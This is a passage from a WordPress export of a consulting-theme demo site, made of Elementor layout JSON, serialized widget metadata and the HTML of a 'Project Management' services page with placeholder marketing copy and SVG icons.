":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"343704f","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"a0bb326","elType":"widget","settings":{"title":"Brochures","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"f12bdfe","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1396f28","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"4fa4a55","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9af4798","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"d4ee160","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"60ffced","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home2.jpg","id":1510},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"904e2fa","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"3c3d54a","elType":"widget","settings":{"title":"Strategic & Tactical Planning","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"dec0c01","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e91e771","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"122c65b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"7bddef1","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"522b33e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e34cba3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"8022263","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ba35e7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"ce7cc23","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail3.jpg","id":982},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"padding":{"unit":"px","top":"70","right":"0","bottom":"70","left":"100","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"e61a616","elType":"column","settings":{"_column_size":50,"_inline_size":45.695999999999997953636921010911464691162109375,"_inline_size_tablet":80},"elements":[{"id":"4c16558","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"65dee06","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"7ab0f67","elType":"widget","settings":{"btn_style":"light","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"abd3090","elType":"column","settings":{"_column_size":50,"_inline_size":54.304000000000002046363078989088535308837890625},"elements":[],"isInner":true}],"isInner":true},{"id":"29089d9","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e0d31db","elType":"column","settings":{"_column_size":50,"_inline_size":48,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c0c4b49","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"typography_typography":"custom","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1507a17","elType":"widget","settings":{"editor":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6bfd814","elType":"column","settings":{"_column_size":50,"_inline_size":52},"elements":[{"id":"ad31a08","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"2ef81ea","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"d8149bc","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"97cbbb6","elType":"widget","settings":{"title":"CORPORATE MANAGEMENT","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"206ff31","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"187c777","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"15a4ea5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ec27098","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8eca34c","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"75ae542"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"a85daa6"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"8e79519"}]},"elements":[],"widgetType":"iaccordions"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:11:{s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:5;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:4;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:4;s:11:"title_color";i:2;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:25:"typography_text_transform";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:13;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:13;s:19:"_inline_size_mobile";i:4;s:19:"_inline_size_tablet";i:3;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:3;s:6:"margin";i:2;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:4:{s:7:"padding";i:5;s:14:"padding_mobile";i:4;s:6:"margin";i:2;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:8:{s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:2;s:7:"_margin";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:9:"btn_style";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_tablet";i:3;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:4;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Project Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/</link>
		<pubDate>Tue, 22 Sep 2020 02:52:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=996</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home2-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
